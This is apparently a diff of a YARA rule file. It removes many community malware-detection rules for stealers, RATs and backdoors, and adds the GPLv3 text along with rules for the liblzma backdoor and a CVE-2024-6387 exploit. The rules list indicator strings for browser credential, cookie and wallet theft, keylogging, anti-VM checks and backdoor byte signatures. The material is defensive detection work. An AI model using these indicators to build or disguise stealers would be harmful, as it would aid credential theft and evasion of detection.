arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. - condition: - uint16(0)==0x5a4d and 5 of them -} -import "pe" + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. -rule DITEKSHEN_MALWARE_Win_Arkei : FILE -{ - meta: - description = "Detect Arkei infostealer variants" - author = "ditekSHen" - id = "d32a27bf-abb9-553c-9913-d675c340a5c5" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L210-L226" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8a79bcc6ac94900c8a8913b2e81424bf900bbac416f44a91db6f208f23980155" - score = 75 - quality = 75 - tags = "FILE" + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. - strings: - $s1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide - $s2 = "/c taskkill /im " fullword ascii - $s3 = "card_number_encrypted FROM credit_cards" ascii - $s4 = "\\wallet.dat" ascii - $s5 = "Arkei/" wide - $s6 = "files\\passwords." ascii wide - $s7 = "files\\cc_" ascii wide - $s8 = "files\\autofill_" ascii wide - $s9 = "files\\cookies_" ascii wide + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. - condition: - uint16(0)==0x5a4d and all of them -} -import "pe" + 12. No Surrender of Others' Freedom. -rule DITEKSHEN_MALWARE_Win_Dcrat : FILE -{ - meta: - description = "DCRat payload" - author = "ditekSHen" - id = "16c81fe0-2c18-55e9-aa17-cfd4213d6a17" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L228-L292" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5a02dcc2b9c7eb3efdba39047e37886240b45fb7e2db3b82aa5b4b9526dfb7f8" - score = 75 - quality = 50 - tags = "FILE" + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. - strings: - $dc1 = "DCRatBuild" ascii - $dc2 = "DCStlr" ascii - $x1 = "px\"><center>DCRat Keylogger" wide - $x2 = "DCRat-Log#" wide - $x3 = "DCRat.Code" wide - $string1 = "CaptureBrowsers" fullword ascii - $string2 = "DecryptBrowsers" fullword ascii - $string3 = "Browsers.IE10" ascii - $string4 = "Browsers.Chromium" ascii - $string5 = "WshShell" ascii - $string6 = "SysMngmts" fullword ascii - $string7 = "LoggerData" fullword ascii - $plugin = "DCRatPlugin" fullword ascii - $av1 = "AntiVM" ascii wide - $av2 = "vmware" fullword wide - $av3 = "VirtualBox" fullword wide - $av4 = "microsoft corporation" fullword wide - $av5 = "VIRTUAL" fullword wide - $av6 = "DetectVirtualMachine" fullword ascii - $av7 = "Select * from Win32_ComputerSystem" fullword wide - $pl1 = "dcratAPI" fullword ascii - $pl2 = "dsockapi" fullword ascii - $pl3 = "file_get_contents" fullword ascii - $pl4 = "classthis" fullword ascii - $pl5 = "typemdt" fullword ascii - $pl6 = "Plugin_AutoStealer" ascii wide - $pl7 = "Plugin_AutoKeylogger" ascii wide - $v1 = "Plugin couldn't process this action!" wide - $v2 = "Unknown command!" wide - $v3 = "PLUGINCONFIGS" wide - $v4 = "Saving log..." wide - $v5 = "~Work.log" wide - $v6 = "MicrophoneNum" fullword wide - $v7 = "WebcamNum" fullword wide - $v8 = "%SystemDrive% - Slow" wide - $v9 = "%UsersFolder% - Fast" wide - $v10 = "%AppData% - Very Fast" wide - $v11 = /<span style=\"color: #F85C50;\">\[(Up|Down|Enter|ESC|CTRL|Shift|Win|Tab|CAPSLOCK: (ON|OFF))\]<\/span>/ wide - $px1 = "[Browsers] Scanned elements: " wide - $px2 = "[Browsers] Grabbing cookies" wide - $px3 = "[Browsers] Grabbing passwords" wide - $px4 = "[Browsers] Grabbing forms" wide - $px5 = "[Browsers] Grabbing CC" wide - $px6 = "[Browsers] Grabbing history" wide - $px7 = "[StealerPlugin] Invoke: " wide - $px8 = "[Other] Grabbing steam" wide - $px9 = "[Other] Grabbing telegram" wide - $px10 = "[Other] Grabbing discord tokens" wide - $px11 = "[Other] Grabbing filezilla" wide - $px12 = "[Other] Screenshots:" wide - $px13 = "[Other] Clipboard" wide - $px14 = "[Other] Saving system information" wide + 13. Use with the GNU Affero General Public License. - condition: - uint16(0)==0x5a4d and ( all of ($dc*) or all of ($string*) or 2 of ($x*) or 6 of ($v*) or 5 of ($px*)) or ($plugin and (4 of ($av*) or 5 of ($pl*))) -} -import "pe" + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. -rule DITEKSHEN_MALWARE_Win_Firebirdrat : FILE -{ - meta: - description = "Firebird/Hive RAT payload" - author = "ditekSHen" - id = "456ae70e-8004-5fb0-a4fd-ce7c0f4704f9" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L316-L339" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1c24e924171db1b99a3b03764f4551b6f4b6b1c9c6147b49dbc0651e85e9040c" - score = 75 - quality = 73 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Firebird-HiveRAT" + 14. Revised Versions of this License. - strings: - $id1 = "Firebird Remote Administration Tool" fullword wide - $id2 = "Welcome to Firebird! Your system is currently being monitored" wide - $id3 = "Hive Remote Administration Tool" fullword wide - $id4 = "Welcome to Hive! Your system is currently being monitored" wide - $s1 = "REPLACETHESEKEYSTROKES" fullword wide - $s2 = "_ENABLE_PROFILING" fullword wide - $s3 = ": KeylogSubject" wide - $s4 = "Firebird.CommandHandler" fullword wide - $s5 = "webcamenabled" fullword ascii - $s6 = "screenlogs" fullword ascii - $s7 = "encryptedconnection" fullword ascii - $s8 = "monitoron" fullword ascii - $s9 = "screenGrab" fullword ascii - $s10 = "TCP_TABLE_OWNER_PID_ALL" fullword ascii - $s11 = "de4fuckyou" fullword ascii + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. - condition: - uint16(0)==0x5a4d and (1 of ($id*) or 7 of ($s*)) -} -import "pe" + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. -rule DITEKSHEN_MALWARE_Win_Phoenix : FILE -{ - meta: - description = "Phoenix/404KeyLogger keylogger payload" - author = "ditekSHen" - id = "62101881-9b5e-586d-8e1b-184787f25d6b" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L341-L367" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b2c2a4ffc36d708a121853fb0268e6dc85b3fe2cd58e05c8124cbef18e03ec0b" - score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Phoenix-Keylogger" + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. - strings: - $s1 = "FirefoxPassReader" fullword ascii - $s2 = "StartKeylogger" fullword ascii - $s3 = "CRYPTPROTECT_" ascii - $s4 = "Chrome_Killer" fullword ascii - $s5 = "Clipboardlog.txt" fullword wide - $s6 = "Leyboardlogs.txt" fullword wide - $s7 = "Persistence'" wide - $s8 = "set_HKB" fullword ascii - $s9 = "loloa" fullword ascii - $s10 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" fullword wide - $m1 = "- Screenshot -------|" ascii wide - $m2 = "- Clipboard -------|" ascii wide - $m3 = "- Logs -------|" ascii wide - $m4 = "- Passwords -------|" ascii wide - $m5 = "PSWD" ascii wide - $m6 = "Screenshot |" ascii wide - $m7 = "Logs |" ascii wide + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. - condition: - ( uint16(0)==0x5a4d and 6 of ($s*) or 3 of ($m*)) or 9 of them -} -import "pe" + 15. Disclaimer of Warranty. -rule DITEKSHEN_MALWARE_Win_Backnet : FILE -{ - meta: - description = "BackNet payload" - author = "ditekSHen" - id = "c53ef72f-4957-5ddb-b096-dcdb69cf900d" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L369-L386" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c276f2b809caad680455fc4ca0a021887d4ff2c9114f05737542a1d3c5cca848" - score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.BackNet" + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - strings: - $s1 = "Slave.Commands." fullword ascii - $s2 = "StartKeylogger" fullword ascii - $s3 = "StopKeylogger" fullword ascii - $s4 = "KeyLoggerCommand" fullword ascii - $s5 = "get_keyLoggerManager" fullword ascii - $s6 = "get_IgnoreMutex" fullword ascii - $s7 = "ListProcesses" fullword ascii - $s8 = "downloadurl" fullword wide - $pdb = "\\BackNet-master\\Slave\\obj\\Release\\Slave.pdb" ascii + 16. Limitation of Liability. - condition: - uint16(0)==0x5a4d and ($pdb or all of ($s*)) -} -import "pe" + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. -rule DITEKSHEN_MALWARE_Win_Acridrain : FILE -{ - meta: - description = "AcidRain stealer payload" - author = "ditekSHen" - id = "9890c9e0-ce53-5f08-9077-c73a9e4ba29c" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L388-L401" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "11884073f4bf466503b07f297ae7fad188f79df148fcc7ca48827c7dbd07e211" - score = 75 - quality = 75 - tags = "FILE" + 17. Interpretation of Sections 15 and 16. - strings: - $s1 = { 43 6f 6f 6b 69 65 73 (5c|2e) } - $s2 = { 74 65 6d 70 6c 6f 67 69 ?? } - $s3 = { 74 65 6d 70 50 ?? 68 } - $s4 = "Connecting to hostname: %s%s%s" fullword ascii - $s5 = "Found bundle for host %s: %p [%s]" fullword ascii - $s6 = "encryptedUsernamencryptedPassworERROR Don't copy string" fullword ascii + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. - condition: - uint16(0)==0x5a4d and all of them -} -import "pe" + END OF TERMS AND CONDITIONS -rule DITEKSHEN_MALWARE_Linux_Chachaddos : FILE -{ - meta: - description = "ChaChaDDoS variant of XorDDoS payload" - author = "ditekSHen" - id = "78a5cf3a-0e84-59bd-a936-bd335647e3d0" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L403-L418" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2bf99771046650820f02a24d5bd825afeacd03d1e865b05d8563a3ef74d521fb" - score = 75 - quality = 75 - tags = "FILE" + How to Apply These Terms to Your New Programs - strings: - $x1 = "[kworker/1:1]" ascii - $x2 = "-- LuaSocket toolkit." ascii - $x3 = "/etc/resolv.conf" ascii - $x4 = "\"macaddress=\" .. DEVICE_MAC .. \"&device=\" .." ascii - $x5 = "easy_attack_dns" ascii - $x6 = "easy_attack_udp" ascii - $x7 = "easy_attack_syn" ascii - $x8 = "syn_probe" ascii + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. - condition: - uint16(0)==0x457f and 6 of them -} -import "pe" + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. -rule DITEKSHEN_MALWARE_Multi_Exaramel : FILE -{ - meta: - description = "Exaramel Windows/Linux backdoor payload" - author = "ditekSHen" - id = "014f10f3-4502-5719-93f6-4b2940f53876" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L420-L459" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e64383304bc913b07a2e63d61c81354b996c01171357005f4a28957d4d889599" - score = 75 - quality = 73 - tags = "FILE" - clamav_sig1 = "MALWARE_Linux.Backdoor.Exaramel" - clamav_sig2 = "MALWARE_Win.Backdoor.Exaramel" + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> - strings: - $s1 = "vendor/golang_org/x/crypto/" ascii - $s2 = "vendor/golang_org/x/net/http2" ascii - $s3 = "vendor/golang_org/x/text/unicode" ascii - $s4 = "vendor/golang_org/x/text/transform" ascii - $s5 = "config.json" ascii - $cmd1 = "App.Update" ascii - $cmd2 = "App.Delete" ascii - $cmd3 = "App.SetProxy" ascii - $cmd4 = "App.SetServer" ascii - $cmd5 = "App.SetTimeout" ascii - $cmd6 = "IO.WriteFile" ascii - $cmd7 = "IO.ReadFile" ascii - $cmd8 = "OS.ShellExecute" ascii - $cmd9 = "awk 'match($0, /(upstart|systemd|sysvinit)/){ print substr($0, RSTART, RLENGTH);exit;" ascii - $ws1 = "/commands/@slp" wide - $ws2 = "/commands/cmd" wide - $ws3 = "/settings/proxy/@password" wide - $ws4 = "/settings/servers/server[@current='true']" wide - $ws5 = "/settings/servers/server/@current[text()='true']" wide - $ws6 = "/settings/servers/server[text()='%s']/@current" wide - $ws7 = "/settings/servers/server[%d]" wide - $ws8 = "/settings/storage" wide - $ws9 = "/settings/check" wide - $ws10 = "/settings/interval" wide - $ws11 = "report.txt" wide - $ws12 = "stg%02d.cab" ascii - $ws13 = "urlmon.dll" ascii - $ws14 = "ReportDir" ascii + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. - condition: - ( uint16(0)==0x457f and ( all of ($s*) and 6 of ($cmd*))) or ( uint16(0)==0x5a4d and 12 of ($ws*)) -} -import "pe" + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. -rule DITEKSHEN_MALWARE_Linux_Hiddenwasp : FILE -{ - meta: - description = "HiddenWasp backdoor payload" - author = "ditekSHen" - id = "220e5e6e-7c5c-5f70-b3eb-50d9c5ec636d" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L461-L486" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a2aad022de41ba2633fc92a7dc5a5fa2efde9da2211cfc01fb2999e33365d6c9" - score = 75 - quality = 71 - tags = "FILE" - clamav_sig1 = "MALWARE_Linux.Trojan.HiddenWasp-ELF" - clamav_sig2 = "MALWARE_Linux.Trojan.HiddenWasp-Script" + You should have received a copy of the GNU General Public License + along with this program. If not, see <https://www.gnu.org/licenses/>. - strings: - $x1 = "I_AM_HIDDEN" fullword ascii - $x2 = "HIDE_THIS_SHELL" fullword ascii - $x3 = "NewUploadFile" ascii - $x4 = "fake_processname" ascii - $x5 = "swapPayload" ascii - $x6 = /Trojan-(Platform|Machine|Hostname|OSersion)/ fullword ascii - $s1 = "FileOpration::GetFileData" fullword ascii - $s2 = "FileOpration::NewUploadFile" fullword ascii - $s3 = "Connection::writeBlock" fullword ascii - $s4 = /hiding_(hidefile|enable_logging|hideproc|makeroot)/ fullword ascii - $s5 = "Reverse-Port" fullword ascii - $s6 = "hidden_services" fullword ascii - $s7 = "check_config" fullword ascii - $s8 = "__data_start" fullword ascii - $s9 = /patch_(suger_lib|ld|lib)/ fullword ascii - $s10 = "hexdump -ve '1/1 \"%%.2X\"' %s | sed \"s/%s/%s/g\" | xxd -r -p > %s.tmp" +Also add information on how to contact you by electronic and paper mail. - condition: - uint16(0)==0x457f and (4 of ($x*) or all of ($s*) or (3 of ($x*) and 5 of ($s*))) -} -import "pe" + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: -rule DITEKSHEN_MALWARE_Multi_Wellmess : FILE + <program> Copyright (C) <year> <name of author> + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +<https://www.gnu.org/licenses/>. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +<https://www.gnu.org/licenses/why-not-lgpl.html>. + + */ +rule CRAIU_Unk_Liblzma_Backdoor : FILE { meta: - description = "WellMess Windows/Linux backdoor payload" - author = "ditekSHen" - id = "cfa0f077-9d45-5796-b888-66fb397e74f8" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L488-L510" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9cbbca609fd289d7406d9073237688d250dc68c450676b9b755509540d8f76a5" + description = "liblzma backdoored" + author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" + id = "3527227b-e19f-5704-8a56-f7d318890658" + date = "2024-03-30" + modified = "2024-03-30" + reference = "https://seclists.org/oss-sec/2024/q1/268" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L1-L30" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + hash = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd" + hash = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae" + hash = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963" + hash = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537" + logic_hash = "ac58a38bff3020dbc881a78b70cf18279644cf6f3ede8d652be3f345ba00974f" score = 75 - quality = 75 + quality = 85 tags = "FILE" - clamav_sig1 = "MALWARE_Win.Trojan.WellMess_DotNet" - clamav_sig2 = "MALWARE_Win.Trojan.WellMess_Golang" - clamav_sig3 = "MALWARE_Linux.Trojan.WellMess_Golang" + version = "1.1" strings: - $s1 = "-----BEGIN PUBLIC KEY-----" ascii - $s2 = "-----END PUBLIC KEY-----" ascii - $s3 = "net/http.(*persistConn).readResponse" ascii - $s4 = "net/http/cookiejar.(*Jar).SetCookies" ascii - $s5 = "_/home/ubuntu/GoProject/src/bot/botlib" ascii - $s6 = "<;head;><;title;>" ascii - $s7 = "<;title;><;service;>" ascii - $s8 = "http://invalidlookup" ascii - $s9 = "<autogenerated>" ascii wide + $a1 = {f3 0f 1e fa 55 48 89 f5 4c 89 ce 53 89 fb 81 e7 00 00 00 80 48 83 ec 28 48 89 54 24 18 48 89 4c 24 10} + $a2 = {48 BF 30 30 30 30 30 30 30 30 8B F1 49 89 D1 89 43 28 48 89 3C 24 BF 3F FC FF 03} condition: - ( uint16(0)==0x457f or uint16(0)==0x5a4d) and all of them + ( uint32be(0)==0x7F454C46) and ( filesize <10MB) and ( any of them ) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Konni : FILE +rule CRAIU_Unk_Liblzma_Encstrings : FILE { meta: - description = "Konni payload" - author = "ditekSHen" - id = "86eae9f6-60b0-5720-8528-ddbe32b6d4a6" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L512-L530" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d57c51f7ede28b74395e5e0fbcc5fd9247b3353330f3e549d5abf99bbd7a1b93" + description = "liblzma backdoor, encoded strings" + author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" + id = "ca491b9c-400e-5f5e-9372-e403a095edba" + date = "2024-03-30" + modified = "2024-03-30" + reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L32-L70" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + logic_hash = "99f5c82f941bb5c1f908209e108f9f80a835ad84157a383faa0dde502486dbd3" score = 75 - quality = 75 + quality = 85 tags = "FILE" + version = "1.0" strings: - $s1 = "uplog.tmp" fullword wide - $s2 = "upfile.tmp" fullword wide - $s3 = "%s-log-%s" fullword ascii wide - $s4 = "%s-down" ascii wide - $s5 = "%s-file-%s" fullword ascii wide - $s6 = "\"rundll32.exe\" \"%s\" install" fullword wide - $s7 = "subject=%s&data=" fullword ascii - $s8 = "dll-x64.dll" fullword ascii - $s9 = "dll-x32.dll" fullword ascii - $pdb1 = "\\virus-dropper\\Release\\virus-dropper.pdb" ascii - $pdb2 = "\\virus-init\\Release\\virus-init.pdb" ascii + $a1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" ascii wide + $a2 = { 04 00 10 08 03 00 00 00 03 00 00 00 03 00 00 00 04 00 78 06 03 00 00 00 03 00 00 00 30 00 0C 00 03 00 00 00 04 00 D8 00 + 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 43 00 00 00 32 00 00 00 03 00 00 00 03 00 00 00 13 01 00 00 + 92 00 00 00 12 00 00 00 42 00 00 00 93 00 00 00 62 00 00 00 B3 00 00 00 B2 00 00 00 03 00 00 00 03 00 00 00 93 00 00 00 + 42 00 00 00 C3 00 00 00 B2 00 00 00 03 00 00 00 12 00 00 00 04 00 08 07 04 00 08 01 12 00 00 00 63 00 00 00 03 00 00 00 + 13 00 00 00 F2 00 00 00 03 00 00 00 A3 00 00 00 92 00 00 00 33 01 00 00 F2 00 00 00 43 01 00 00 22 00 00 00 22 01 00 00 + 04 00 70 08 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 92 00 00 00 83 00 00 00 23 00 00 00 82 01 00 00 63 01 00 00 + 13 00 00 00 04 00 A0 01 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 B2 01 00 00 03 00 00 00 03 00 00 00 03 00 00 00 + 23 01 00 00 43 00 00 00 C2 00 00 00 90 01 30 00 72 00 00 00 21 01 04 00 03 01 00 00 92 00 00 00 22 01 00 00 32 00 00 00 } + $a3 = { + 33 01 00 00 D2 00 00 00 12 00 00 00 13 00 00 00 04 00 40 0C E2 00 00 00 03 00 00 00 53 01 00 00 22 01 00 00 04 00 D0 06 + E2 00 00 00 A3 00 00 00 92 00 00 00 53 01 00 00 A0 00 14 00 D2 01 00 00 04 00 58 09 62 00 00 00 92 00 00 00 04 00 18 04 + 42 01 00 00 13 00 00 00 B3 01 00 00 04 00 E0 04 33 00 00 00 A2 01 00 00 43 01 00 00 92 00 00 00 A2 00 00 00 33 02 00 00 + 72 01 00 00 10 00 40 00 A0 00 30 00 00 02 20 00 A2 00 00 00 21 00 0C 00 12 00 00 00 04 00 90 07 B2 01 00 00 53 00 00 00 + 93 01 00 00 92 00 00 00 22 01 00 00 83 01 00 00 53 00 00 00 82 00 00 00 32 01 00 00 03 02 00 00 62 01 00 00 63 01 00 00 + B2 00 00 00 22 01 00 00 33 00 00 00 33 00 00 00 73 00 00 00 04 00 18 00 D2 01 00 00 13 02 00 00 52 00 00 00 D3 00 00 00 + 02 01 00 00 C3 00 00 00 52 00 00 00 D3 00 00 00 B2 01 00 00 A3 01 00 00 23 00 00 00 E2 01 00 00 33 00 00 00 33 00 00 00 + B3 01 00 00 A2 00 00 00 53 00 00 00 B3 00 00 00 C2 01 00 00 D3 01 00 00 03 00 00 00 22 00 00 00 63 00 00 00 12 00 00 00 } condition: - uint16(0)==0x5a4d and (7 of ($s*) or (3 of ($s*) and 1 of ($pdb*))) + ( filesize <15MB) and ( any of them ) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Bitterrat : FILE +rule CRAIU_Exploit_CVE_2024_6387 : CVE_2024_6387 FILE { meta: - description = "BitterRAT payload" - author = "ditekSHen" - id = "cccb2102-b78a-59ce-98e6-c702c4bec4d4" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L532-L551" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f9dec388af6ddc767f82d7de7ba47754e76058022e6e55bbafd846ca8655a03b" + description = "Strings from CVE-2024-6387 exploit PoC by zgzhang." + author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro" + id = "6ac63016-864d-57af-bb36-3115a0a91021" + date = "2024-07-02" + modified = "2024-07-03" + reference = "https://github.com/zgzhang/cve-2024-6387-poc/tree/main" + 